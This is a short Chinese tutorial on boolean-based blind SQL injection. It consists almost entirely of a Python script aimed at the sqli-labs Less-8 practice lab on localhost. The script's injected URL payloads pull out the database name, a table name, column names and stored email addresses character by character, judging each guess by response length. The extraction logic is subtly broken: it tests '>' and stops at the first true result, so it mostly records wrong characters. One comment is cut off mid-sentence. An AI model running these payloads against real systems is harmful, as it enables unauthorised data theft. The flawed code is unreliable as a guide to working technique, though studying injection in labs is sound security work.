基于布尔的盲注

 盲注是注入的一种，指的是在不知道数据返回值的情况下对数据中的内容进行猜测，实施注入。盲注一般分为布尔盲注和基于时间的盲注

 #coding:utf-8
 2 import requests
 3 
 4 # chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
 5 
 6 #得知库名长度是8：http://localhost/sqlilabs/Less-8/?id=2' and length(database())>2 %23
 7 
 8 def get_db_name():
 9     result=""
10     url_tempate="http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr(database(),{0},1))>{1} %23"
11     chars='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
12     for i in range(1,9):
13         for char in chars:
14             char_ascii=ord(char)
15             url=url_tempate.format(i,char_ascii)
16             response=requests.get(url)
17             length=len(response.text)
18             #返回的长度只有706和722
19             if length > 706:
20                 result +=char
21                 break
22     print (result)
23 
24 #此处http://localhost/sqlilabs/Less-8/?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23得知表名长度是6
25 def get_table_name():
26     result=""
27     url_tempate="http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))>{1} %23"
28     chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
29     for i in range(1,7):
30         for char in chars:
31             char_ascii=ord(char)
32             url=url_tempate.format(i,char_ascii)
33             response=requests.get(url)
34             length=len(response.text)
35             #返回的长度只有706和722
36             if length>706:
37                 result+=char
38                 break
39     print(result)
40 
41 #在得到列名之前，同样需要知道在表中的字段长度。例如我们想要知道在emails表中的长度，那么就可以使用如下的语句来获取。http://localhost/sqlilabs/Less-8/?id=2' and (select length(column_name) from inf
42 
43 def get_column_name():
44  result = ""
45  url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),{0},1))>{1} %23"
46  chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
47  for i in range(1,3):
48   for char in chars:
49    char_ascii = ord(char)
50    url = url_template.format(i,char_ascii)
51    response = requests.get(url)
52    length = len(response.text)
53    #返回的长度只有706和722
54    if length>706:
55     result += char
56     break
57  print(result)
58 
59 def get_data():
60  result = ""
61  url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii(substr((select email_id from emails limit 0,1),{0},1))>{1} %23"
62  chars = '.0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
63  for i in range(1,17):
64   for char in chars:
65    char_ascii = ord(char)
66    url = url_template.format(i,char_ascii)
67    response = requests.get(url)
68    length = len(response.text)
69    #返回的长度只有706和722
70    if length>706:
71     result += char
72     break
73  print(result)